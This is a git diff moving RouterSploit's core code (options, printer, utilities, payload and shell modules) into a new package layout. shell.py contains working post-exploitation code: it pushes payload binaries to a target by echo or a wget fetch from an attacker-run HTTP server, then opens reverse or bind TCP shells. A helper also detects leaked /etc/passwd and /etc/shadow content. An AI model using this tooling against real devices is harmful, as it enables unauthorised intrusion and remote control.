WARNING: + Important thing to remember is fact that decorator will + supress values returned by decorated function. Since method that + perform attack is not supposed to return anything this is not a problem. + + """ + + @wraps(fn) + def wrapper(self, *args, **kwargs): + if self.target.startswith("file://"): + original_target = self.target + original_port = self.port + + _, _, feed_path = self.target.partition("file://") + try: + with open(feed_path) as file_handler: + for target in file_handler: + target = target.strip() + if not target: + continue + + self.target, _, port = target.partition(":") + if port: + self.port = port + else: + self.port = original_port + + fn(self, *args, **kwargs) + self.target = original_target + self.port = original_port + return # Nothing to return, ran multiple times + + except IOError: + return + else: + return fn(self, *args, **kwargs) + + return wrapper + + +class DummyFile(object): + """ Mocking file object. Optimilization for the "mute" decorator. """ + def write(self, x): + pass + + +def mute(fn): + """ Suppress function from printing to sys.stdout """ + + @wraps(fn) + def wrapper(self, *args, **kwargs): + thread_output_stream.setdefault(threading.current_thread(), []).append(DummyFile()) + try: + return fn(self, *args, **kwargs) + finally: + thread_output_stream[threading.current_thread()].pop() + return wrapper + + +class LockedIterator(object): + def __init__(self, it): + self.lock = threading.Lock() + self.it = it.__iter__() + + def __iter__(self): + return self + + def next(self): + self.lock.acquire() + try: + item = next(self.it) + + if type(item) is tuple: + return (item[0].strip(), item[1].strip()) + elif type(item) is str: + return item.strip() + + return item + finally: + self.lock.release() + + +class Protocol: + TCP = "custom/tcp" + UDP = "custom/udp" + FTP = "ftp" + FTPS = "ftps" + SSH = "ssh" + TELNET = "telnet" + HTTP = "http" + HTTPS = "https" + SNMP = "snmp" + + diff --git a/routersploit/core/exploit/option.py b/routersploit/core/exploit/option.py new file mode 100644 index 000000000..677192178 --- /dev/null +++ b/routersploit/core/exploit/option.py @@ -0,0 +1,138 @@ +import re +import os.path + +from routersploit.core.exploit.exceptions import OptionValidationError +from routersploit.core.exploit.utils import ( + is_ipv4, + is_ipv6, +) + + +class Option(object): + """ Exploit attribute that is set by the end user """ + + def __init__(self, default, description=""): + self.label = None + self.description = description + + self.default = default + self.display_value = default + self.value = default + + def __get__(self, instance, owner): + return self.value + + def __set__(self, instance, value): + if self._apply_widget(value): + self.display_value = value + self.value = value + + def set_label(self, label): + self.label = label + + +class OptIP(Option): + """ Option IP attribute """ + + def _apply_widget(self, value): + if is_ipv4(value) or is_ipv6(value): + return value + else: + raise OptionValidationError("Invalid address. Provided address is not valid IPv4 or IPv6 address.") + + +class OptPort(Option): + """ Option Port attribute """ + + def _apply_widget(self, value): + try: + value = int(value) + + if 0 < value <= 65535: # max port number is 65535 + return value + else: + raise OptionValidationError("Invalid option. Port value should be between 0 and 65536.") + except ValueError: + raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value)) + + +class OptBool(Option): + """ Option Bool attribute """ + + def _apply_widget(self, value): + if value in ["true", "false"]: + return value + else: + raise OptionValidationError("Invalid value. It should be true or false.") + + def __get__(self, instance, owner): + if self.display_value == "true": + return True + + return False + + +class OptInteger(Option): + """ Option Integer attribute """ + + def _apply_widget(self, value): + try: + return int(value) + except ValueError: + raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value)) + + +class OptFloat(Option): + """ Option Float attribute """ + + def _apply_widget(self, value): + try: + return float(value) + except ValueError: + raise OptionValidationError("Invalid option. Cannot cast '{}' to float.".format(value)) + + +class OptString(Option): + """ Option String attribute """ + + def _apply_widget(self, value): + try: + return str(value) + except ValueError: + raise OptionValidationError("Invalid option. Cannot cast '{}' to string.".format(value)) + + +class OptMAC(Option): + """ Option MAC attribute """ + + def _apply_widget(self, value): + regexp = r"^[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}$" + if re.match(regexp, value.lower()): + return value + else: + raise OptionValidationError("Invalid option. '{}' is not a valid MAC address".format(value)) + + +class OptWordlist(Option): + """ Option Wordlist attribtue """ + + def _apply_widget(self, value): + if value.startswith("file://"): + path = value.replace("file://", "") + if not os.path.exists(path): + raise OptionValidationError("File '{}' does not exist.".format(path)) + return value + + return value + + def __get__(self, instance, owner): + if self.display_value.startswith("file://"): + path = self.display_value.replace("file://", "") + with open(path, "r") as f: + lines = [line.strip() for line in f.readlines()] + return lines + + return self.display_value.split(",") + + def __set__(self, instance, value): + self.display_value = value diff --git a/routersploit/payloads.py b/routersploit/core/exploit/payloads.py similarity index 61% rename from routersploit/payloads.py rename to routersploit/core/exploit/payloads.py index c93bb6963..b972b3cdf 100644 --- a/routersploit/payloads.py +++ b/routersploit/core/exploit/payloads.py @@ -1,9 +1,27 @@ from collections import namedtuple from struct import pack +from future.utils import with_metaclass -from routersploit import exploits, validators -from routersploit.exceptions import OptionValidationError -from utils import print_info, print_status, print_success, print_error, random_text +from routersploit.core.exploit.exploit import ( + BaseExploit, + ExploitOptionsAggregator, +) +from routersploit.core.exploit.option import ( + OptIP, + OptPort, + OptString, +) +from routersploit.core.exploit.exceptions import OptionValidationError +from routersploit.core.exploit.printer import ( + print_status, + print_error, + print_success, + print_info, +) + +from routersploit.core.exploit.utils import ( + random_text, +) architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE"]) @@ -22,51 +40,44 @@ ARCH_ELF_HEADERS = { Architectures.ARMLE: ( - "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" - "\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" - "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" - "\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" - "\x00\x10\x00\x00" + b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" + b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" + b"\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" + b"\x00\x10\x00\x00" ), Architectures.MIPSBE: ( - "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" - "\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00" - "\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07" - "\x00\x00\x10\x00" + b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00" + b"\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07" + b"\x00\x00\x10\x00" ), Architectures.MIPSLE: ( - "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" - "\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" - "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00" - "\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" - "\x00\x10\x00\x00" + b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" + b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00" + b"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" + b"\x00\x10\x00\x00" ), } -class ReverseTCPPayloadMixin(object): - __metaclass__ = exploits.ExploitOptionsAggregator - +class ReverseTCPPayloadMixin(with_metaclass(ExploitOptionsAggregator, object)): handler = PayloadHandlers.REVERSE_TCP - lhost = exploits.Option('', 'Connect-back IP address', - validators=validators.ipv4) - lport = exploits.Option(5555, 'Connect-back TCP Port', - validators=validators.integer) - + lhost = OptIP('', 'Connect-back IP address') + lport = OptPort(5555, 'Connect-back TCP Port') -class BindTCPPayloadMixin(object): - __metaclass__ = exploits.ExploitOptionsAggregator +class BindTCPPayloadMixin(with_metaclass(ExploitOptionsAggregator, object)): handler = PayloadHandlers.BIND_TCP - rport = exploits.Option(5555, 'Bind Port', - validators=validators.integer) + rport = OptPort(5555, 'Bind Port') -class BasePayload(exploits.BaseExploit): +class BasePayload(BaseExploit): handler = None def __init__(self): @@ -87,8 +98,8 @@ def run(self): class ArchitectureSpecificPayload(BasePayload): architecture = None - output = exploits.Option('python', 'Output type: elf/c/python') - filepath = exploits.Option( + output = OptString('python', 'Output type: elf/c/python') + filepath = OptString( "/tmp/{}".format(random_text(8)), 'Output file to write' ) @@ -113,7 +124,7 @@ def run(self): return if self.output == "elf": - with open(self.filepath, 'w+') as f: + with open(self.filepath, 'wb+') as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) @@ -150,7 +161,7 @@ def generate_c(data): for idx, x in enumerate(data): if idx % 15 == 0 and idx != 0: res += "\"\n \"" - res += "\\x%02x" % ord(x) + res += "\\x%02x" % x res += "\"\n};" return res @@ -160,7 +171,7 @@ def generate_python(data): for idx, x in enumerate(data): if idx % 15 == 0 and idx != 0: res += "\"\n \"" - res += "\\x%02x" % ord(x) + res += "\\x%02x" % x res += "\"\n)" return res diff --git a/routersploit/core/exploit/printer.py b/routersploit/core/exploit/printer.py new file mode 100644 index 000000000..622ba63b5 --- /dev/null +++ b/routersploit/core/exploit/printer.py @@ -0,0 +1,189 @@ +from __future__ import print_function +from __future__ import absolute_import + +import threading +import sys +import collections +from weakref import WeakKeyDictionary + +try: + import queue +except ImportError: # Python 3.x + import Queue as queue + + +printer_queue = queue.Queue() +thread_output_stream = WeakKeyDictionary() + +PrintResource = collections.namedtuple("PrintResource", ["content", "sep", "end", "file", "thread"]) + + +class PrinterThread(threading.Thread): + def __init__(self): + super(PrinterThread, self).__init__() + self.daemon = True + + def run(self): + while True: + content, sep, end, file_, thread = printer_queue.get() + print(*content, sep=sep, end=end, file=file_) + printer_queue.task_done() + + +def __cprint(*args, **kwargs): + """ Color print() + + Signature like Python 3 print() function + print([object, ...][, sep=' '][, end='\n'][, file=sys.stdout]) + """ + if not kwargs.pop("verbose", True): + return + + color = kwargs.get("color", None) + sep = kwargs.get("sep", " ") + end = kwargs.get("end", "\n") + thread = threading.current_thread() + try: + file_ = thread_output_stream.get(thread, ())[-1] + except IndexError: + file_ = kwargs.get("file", sys.stdout) + + if color: + printer_queue.put(PrintResource(content="\033[{}m".format(colors[color]), end="", file=file_, sep=sep, thread=thread)) + printer_queue.put(PrintResource(content=args, end="", file=file_, sep=sep, thread=thread)) # TODO printing text that starts from newline + printer_queue.put(PrintResource(content="\033[0m", sep=sep, end=end, file=file_, thread=thread)) + else: + printer_queue.put(PrintResource(content=args, sep=sep, end=end, file=file_, thread=thread)) + + +def print_error(*args, **kwargs): + __cprint("\033[91m[-]\033[0m", *args, **kwargs) + + +def print_status(*args, **kwargs): + __cprint("\033[94m[*]\033[0m", *args, **kwargs) + + +def print_success(*args, **kwargs): + __cprint("\033[92m[+]\033[0m", *args, **kwargs) + + +def print_info(*args, **kwargs): + __cprint(*args, **kwargs) + + +def print_table(headers, *args, **kwargs): + """ Print table. + + example: + + Name Current setting Description + ---- --------------- ----------- + option_name value description + foo bar baz + foo bar baz + + :param headers: Headers names ex.('Name, 'Current setting', 'Description') + :param args: table values, each element representing one line ex. ('option_name', 'value', 'description), ... + :param kwargs: 'extra_fill' space between columns, 'header_separator' character to separate headers from content + :return: + """ + extra_fill = kwargs.get("extra_fill", 5) + header_separator = kwargs.get("header_separator", "-") + + if not all(map(lambda x: len(x) == len(headers), args)): + print_error("Headers and table rows tuples should be the same length.") + return + + def custom_len(x): + try: + return len(x) + except TypeError: + return 0 + + fill = [] + headers_line = ' ' + headers_separator_line = ' ' + for idx, header in enumerate(headers): + column = [custom_len(arg[idx]) for arg in args] + column.append(len(header)) + + current_line_fill = max(column) + extra_fill + fill.append(current_line_fill) + headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill))) + headers_separator_line = "".join(( + headers_separator_line, + "{:<{}}".format(header_separator * len(header), current_line_fill) + )) + + print_info() + print_info(headers_line) + print_info(headers_separator_line) + for arg in args: + content_line = " " + for idx, element in enumerate(arg): + content_line = "".join(( + content_line, + "{:<{}}".format(element, fill[idx]) + )) + print_info(content_line) + + print_info() + + +def pprint_dict_in_order(dictionary, order=None): + """ Pretty dict print. + + Pretty printing dictionary in specific order. (as in 'show info' command) + Keys not mentioned in *order* parameter will be printed in random order. + + ex. pprint_dict_in_order({'name': John, 'sex': 'male', "hobby": ["rugby", "golf"]}, ('sex', 'name')) + + Sex: + male + + Name: + John + + Hobby: + - rugby + - golf + + """ + order = order or () + + def prettyprint(title, body): + print_info("\n{}:".format(title.capitalize())) + if not isinstance(body, str): + for value_element in body: + print_info("- ", value_element) + else: + print_info(body) + + keys = list(dictionary.keys()) + for element in order: + try: + key = keys.pop(keys.index(element)) + value = dictionary[key] + except (KeyError, ValueError): + pass + else: + prettyprint(element, value) + + for rest_keys in keys: + prettyprint(rest_keys, dictionary[rest_keys]) + + +def color_blue(string): + """ Returns string colored with blue """ + return "\033[94m{}\033[0m".format(string) + + +def color_green(string): + """ Returns string colored with green """ + return "\033[92m{}\033[0m".format(string) + + +def color_red(string): + """ Returns string colored with red """ + return "\033[91m{}\033[0m".format(string) diff --git a/routersploit/shell.py b/routersploit/core/exploit/shell.py similarity index 79% rename from routersploit/shell.py rename to routersploit/core/exploit/shell.py index 013fce4ed..20b4cac18 100644 --- a/routersploit/shell.py +++ b/routersploit/core/exploit/shell.py @@ -1,73 +1,97 @@ import socket import telnetlib -import SimpleHTTPServer -import BaseHTTPServer +from http.server import BaseHTTPRequestHandler, HTTPServer import threading import time from os import listdir from os.path import isfile, join import importlib -from printer import printer_queue -from routersploit import validators - -from routersploit.utils import ( +from routersploit.core.exploit.printer import ( + printer_queue, print_info, print_error, print_success, print_status, print_table, +) + +from routersploit.core.exploit.utils import ( random_text, ) def shell(exploit, architecture="", method="", payloads=None, **params): - path = "routersploit/modules/payloads/{}/".format(architecture) + available_payloads = {} payload = None options = [] - if not payloads: - payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"] + if architecture and method: + path = "routersploit/modules/payloads/{}/".format(architecture) + + # get all payloads for given architecture + all_payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"] + + payload_path = path.replace("/", ".") + for p in all_payloads: + module = getattr(importlib.import_module("{}{}".format(payload_path, p)), 'Exploit') + + # if method/arch is cmd then filter out payloads + if method is "cmd": + if getattr(module, "cmd") in payloads: + available_payloads[p] = module + else: + available_payloads[p] = module print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") - print_status("Depending on the vulnerability, command's results might not be available.") print_status("For further exploitation use 'show payloads' and 'set payload ' commands.") print_info() - while 1: + while True: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: - cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__['name']) + cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__["name"]) - cmd = raw_input(cmd_str) + cmd = input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": + if not available_payloads: + print_error("There are no available payloads for this exploit") + continue + print_status("Available payloads:") - for payload_name in payloads: - print_info("- {}".format(payload_name)) + headers = ("Payload", "Name", "Description") + data = [] + for p in available_payloads.keys(): + data.append((p, available_payloads[p]._Exploit__info__["name"], available_payloads[p]._Exploit__info__["description"])) + + print_table(headers, *data) elif cmd.startswith("set payload "): + if not available_payloads: + print_error("There are no available payloads for this exploit") + continue + c = cmd.split(" ") - if c[2] in payloads: - payload_path = path.replace("/", ".") + c[2] - payload = getattr(importlib.import_module(payload_path), 'Exploit')() + if c[2] in available_payloads.keys(): + payload = available_payloads[c[2]]() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: - options.append([option, getattr(payload, option), payload.exploit_attributes[option]]) + options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]]) if payload.handler == "bind_tcp": - options.append(["rhost", validators.ipv4(exploit.target), "Target IP address"]) + options.append(["rhost", exploit.target, "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) @@ -97,7 +121,7 @@ def shell(exploit, architecture="", method="", payloads=None, **params): break option[1] = c[2] - print_success("{'" + c[1] + "': '" + c[2] + "'}") + print_info("{} => {}".format(c[1], c[2])) elif cmd == "run": data = payload.generate() @@ -113,8 +137,8 @@ def shell(exploit, architecture="", method="", payloads=None, **params): communication = Communication(exploit, elf_binary, options, **params) communication.echo() - elif method == "generic": - params['exec_binary'] = data + elif method == "cmd": + params["exec_binary"] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": @@ -130,10 +154,10 @@ def shell(exploit, architecture="", method="", payloads=None, **params): print_info(exploit.execute(cmd)) -class HttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): +class HttpRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) - self.send_header('Content-type', 'text/html') + self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(self.server.content) @@ -143,7 +167,7 @@ def log_message(self, format, *args): return -class HttpServer(BaseHTTPServer.HTTPServer): +class HttpServer(HTTPServer): def serve_forever(self, content): self.stop = False self.content = content @@ -199,21 +223,21 @@ def wget(self): # run http server self.mutex = True - thread = threading.Thread(target=self.http_server, args=(self.options['lhost'], self.options['lport'])) + thread = threading.Thread(target=self.http_server, args=(self.options["lhost"], self.options["lport"])) thread.start() while self.mutex: pass if self.port_used: - print_error("Could not set up HTTP Server on {}:{}".format(self.options['lhost'], self.options['lport'])) + print_error("Could not set up HTTP Server on {}:{}".format(self.options["lhost"], self.options["lport"])) return False # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, - self.options['lhost'], - self.options['lport'], + self.options["lhost"], + self.options["lport"], self.binary_name, self.location, self.binary_name) @@ -229,19 +253,19 @@ def echo(self): # echo stream e.g. echo -ne {} >> {} if "stream" in self.echo_options.keys(): - echo_stream = self.echo_options['stream'] + echo_stream = self.echo_options["stream"] else: echo_stream = 'echo -ne "{}" >> {}' # echo prefix e.g. "\\x" if "prefix" in self.echo_options.keys(): - echo_prefix = self.echo_options['prefix'] + echo_prefix = self.echo_options["prefix"] else: echo_prefix = "\\x" # echo max length of the block if "max_length" in self.echo_options.keys(): - echo_max_length = int(self.echo_options['max_length']) + echo_max_length = int(self.echo_options["max_length"]) else: echo_max_length = 30 @@ -254,7 +278,7 @@ def echo(self): current = i * echo_max_length print_status("Transferring {}/{} bytes".format(current, len(self.payload))) - block = self.payload[current:current + echo_max_length].encode('hex') + block = self.payload[current:current + echo_max_length].encode("hex") block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2])) cmd = echo_stream.format(block, path) self.exploit.execute(cmd) @@ -288,7 +312,7 @@ def build_commands(self): elif callable(item_exec_binary): commands.append(item_exec_binary(path)) - # instruction to execute generic payload e.g. netcat / awk + # instruction to execute cmd payload e.g. netcat / awk elif isinstance(self.exec_binary, str): try: commands.append(self.exec_binary.format(path)) @@ -303,9 +327,9 @@ def build_commands(self): return commands def reverse_tcp(self): - sock = self.listen(self.options['lhost'], self.options['lport']) + sock = self.listen(self.options["lhost"], self.options["lport"]) if self.port_used: - print_error("Could not set up listener on {}:{}".format(self.options['lhost'], self.options['lport'])) + print_error("Could not set up listener on {}:{}".format(self.options["lhost"], self.options["lport"])) return # execute binary @@ -350,9 +374,9 @@ def bind_tcp(self): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((self.options['rhost'], int(self.options['rport']))) + sock.connect((self.options["rhost"], int(self.options["rport"]))) except socket.error: - print_error("Could not connect to {}:{}".format(self.options['rhost'], self.options['rport'])) + print_error("Could not connect to {}:{}".format(self.options["rhost"], self.options["rport"])) return print_success("Enjoy your shell") diff --git a/routersploit/core/exploit/utils.py b/routersploit/core/exploit/utils.py new file mode 100644 index 000000000..33ab25829 --- /dev/null +++ b/routersploit/core/exploit/utils.py @@ -0,0 +1,263 @@ +import re +import os +import importlib +import string +import random +from functools import wraps + +import routersploit.modules as rsf_modules +import routersploit.resources.wordlists as wordlists + +from routersploit.core.exploit.printer import print_error +from routersploit.core.exploit.exceptions import RoutersploitException + +MODULES_DIR = rsf_modules.__path__[0] +WORDLISTS_DIR = wordlists.__path__[0] + + +def random_text(length, alph=string.ascii_letters + string.digits): + return ''.join(random.choice(alph) for _ in range(length)) + + +def is_ipv4(address): + """ Checks if given address is valid IPv4 address """ + + regexp = "^(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$" + if re.match(regexp, address): + return True + + return False + + +def is_ipv6(address): + """ Checks if given address is valid IPv6 address """ + + regexp = "^(?:(?:[0-9A-Fa-f]{1,4}:){6}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|::(?:[0-9A-Fa-f]{1,4}:){5}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){4}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){3}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,2}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){2}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,3}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}:(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,4}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,5}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}|(?:(?:[0-9A-Fa-f]{1,4}:){,6}[0-9A-Fa-f]{1,4})?::)%.*$" + + if re.match(regexp, address): + return True + + return False + + +def convert_ip(address): + """ Converts IP to bytes """ + + res = b"" + for i in address.split("."): + res += bytes([int(i)]) + return res + + +def convert_port(port): + """ Converts Port to bytes """ + + res = "%.4x" % int(port) + return bytes.fromhex(res) + + +def index_modules(modules_directory=MODULES_DIR): + """ Returns list of all exploits modules """ + + modules = [] + for root, dirs, files in os.walk(modules_directory): + _, package, root = root.rpartition("routersploit/modules/".replace("/", os.sep)) + root = root.replace(os.sep, ".") + files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files) + modules.extend(map(lambda x: ".".join((root, os.path.splitext(x)[0])), files)) + + return modules + + +def import_exploit(path): + """ Imports exploit module + + :param path: absolute path to exploit e.g. routersploit.modules.exploits.asus_auth_bypass + :return: exploit module or error + """ + + try: + module = importlib.import_module(path) + return getattr(module, "Exploit") + except (ImportError, AttributeError, KeyError) as err: + raise RoutersploitException( + "Error during loading '{}'\n\n" + "Error: {}\n\n" + "It should be valid path to the module. " + "Use key multiple times for completion.".format(humanize_path(path), err) + ) + + +def iter_modules(modules_directory=MODULES_DIR): + """ Iterates over valid modules """ + + modules = index_modules(modules_directory) + modules = map(lambda x: "".join(["routersploit.modules.", x]), modules) + for path in modules: + try: + yield import_exploit(path) + except RoutersploitException: + pass + + +def pythonize_path(path): + """ Replaces argument to valid python dotted notation. + + ex. foo/bar/baz -> foo.bar.baz + """ + + return path.replace("/", ".") + + +def humanize_path(path): + """ Replace python dotted path to directory-like one. + + ex. foo.bar.baz -> foo/bar/baz + + :param path: path to humanize + :return: humanized path + """ + + return path.replace(".", "/") + + +def module_required(fn): + """ Checks if module is loaded. + + Decorator that checks if any module is activated + before executing command specific to modules (ex. 'run'). + """ + @wraps(fn) + def wrapper(self, *args, **kwargs): + if not self.current_module: + print_error("You have to activate any module with 'use' command.") + return + return fn(self, *args, **kwargs) + + try: + name = "module_required" + wrapper.__decorators__.append(name) + except AttributeError: + wrapper.__decorators__ = [name] + return wrapper + + +def stop_after(space_number): + """ Decorator that determines when to stop tab-completion + + Decorator that tells command specific complete function + (ex. "complete_use") when to stop tab-completion. + Decorator counts number of spaces (' ') in line in order + to determine when to stop. + + ex. "use exploits/dlink/specific_module " -> stop complete after 2 spaces + "set rhost " -> stop completing after 2 spaces + "run " -> stop after 1 space + + :param space_number: number of spaces (' ') after which tab-completion should stop + :return: + """ + + def _outer_wrapper(wrapped_function): + @wraps(wrapped_function) + def _wrapper(self, *args, **kwargs): + try: + if args[1].count(" ") == space_number: + return [] + except Exception as err: + print_info(err) + return wrapped_function(self, *args, **kwargs) + return _wrapper + return _outer_wrapper + + +def lookup_vendor(addr): + """ Lookups vendor (manufacturer) based on MAC address """ + + addr = addr.upper().replace(":", "") + + path = "./routersploit/resources/vendors/oui.dat" + with open(path, "r") as f: + for line in f.readlines(): + line = line.strip() + if line == "" or line[0] == "#": + continue + + mac, name = line.split(" ", 1) + if addr.startswith(mac): + return name + + return None + + +class Version(object): + def __init__(self, value): + self.value = str(value) + + def __set__(self, value): + self.value = value + + def __lt__(self, other): + """Override the default xy""" + return self.value != other.value + + def __gt__(self, other): + """Override the defualt x>y""" + if self._compare_versions(self.value, other.value) > 0: + return True + return False + + def __ge__(self, other): + """Override the default x>=y""" + if self._compare_versions(self.value, other.value) >= 0: + return True + return False + + @staticmethod + def _compare_versions(version1, version2): + """ + Simple and dirty implementation + if version1 < version2 then -1 + if version1 == version2 then 0 + if version1 > version2 then 1 + """ + + arr1 = re.sub("\D", ".", str(version1)).split(".") + arr2 = re.sub("\D", ".", str(version2)).split(".") + + i = 0 + + while(i < len(arr1)): + if int(arr2[i]) > int(arr1[i]): + return -1 + + if int(arr1[i]) > int(arr2[i]): + return 1 + + i += 1 + + return 0 + + +def detect_file_content(content, f="/etc/passwd"): + if f in ["/etc/passwd", "/etc/shadow"]: + if re.findall(r"(root|[aA]dmin):.*?:.*?:.*?:.*?:.*?:", content): + return True + + return False diff --git a/routersploit/templates/__init__.py b/routersploit/core/ftp/__init__.py similarity index 100% rename from routersploit/templates/__init__.py rename to routersploit/core/ftp/__init__.py diff --git a/routersploit/core/ftp/ftp_client.py b/routersploit/core/ftp/ftp_client.py new file mode 100644 index 000000000..2f43d530c --- /dev/null +++ b/routersploit/core/ftp/ftp_client.py @@ -0,0 +1,64 @@ +import socket +import ftplib + +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.exploit.option import OptBool +from routersploit.core.exploit.printer import print_error + + +FTP_TIMEOUT = 30.0 + + 